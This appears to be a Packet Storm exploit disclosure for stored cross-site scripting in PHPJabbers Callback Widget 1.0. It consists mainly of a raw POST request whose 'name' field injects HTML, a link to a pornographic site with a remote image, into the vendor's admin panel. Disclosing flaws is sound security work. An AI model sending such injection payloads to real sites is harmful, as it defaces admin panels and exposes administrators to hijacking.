PHPJ Callback Widget 1.0 Cross Site Scripting
2024-1-30 00:19:40 Author: packetstormsecurity.com(查看原文) 阅读量:3 收藏

## Title: PHPJ-Callback-Widget-1.0-XSS-Stored-admin-Hijacking
## Author: nu11secur1ty
## Date: 01/26/2024
## Vendor: https://www.phpjabbers.com/
## Software: https://www.phpjabbers.com/callback-widget/
## Reference: https://portswigger.net/web-security/cross-site-scripting

## Description:
The Callback Requests function is vulnerable to javascript injection.
The malicious user from everywhere can send an XSs-stored exploit code
to the admin panel, and then when the admin visits the API Callback
Requests function he will immediately activate the exploitation of the
malicious actor. This is so fun, thanks for watching the PoC video. =)
BR

STATUS: HIGH-Vulnerability

[+]Exploit:
```POST
POST /1706261102_419/index.php?controller=pjFront&action=pjActionSave HTTP/1.1
Host: demo.phpjabbers.com
Cookie: _ga=GA1.2.2069938240.1692907228;
_fbp=fb.1.1705479327501.84379277;
_ga_NME5VTTGTT=GS1.2.1705493664.10.1.1705493702.22.0.0;
CallbackWidget=irnrkmih5bc4ehc7fcgbc8ql84
Content-Length: 322
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.216
Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.phpjabbers.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.phpjabbers.com/1706261102_419/preview.php?theme=theme1
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=1, i
Connection: close

reason_id=2&name=%3Ca+href%3D%22https%3A%2F%2Fwww.pornhub.com%22+target%3D%22_blank%22%3E+%09%3Cimg+src%3D%22https%3A%2F%2Fel.phncdn.com%2Fgif%2F45467111.gif%22+alt%3D%22STUPID%22width%3D%22900%22+height%3D%22450%22%3E+%3C%2Fa%3E&email=hack%40hack.com&phone=1234567890&besttime=30-01-2024+11%3A30&timezone=0&captcha=VIXFWL

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2024/Callback-Widget-1.0)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2024/01/phpj-callback-widget-10-xss-reflected.html)

## Time spent:
00:15:00


文章来源: https://packetstormsecurity.com/files/176834/phpjcw10-xss.txt
如有侵权请联系:admin#unsafe.sh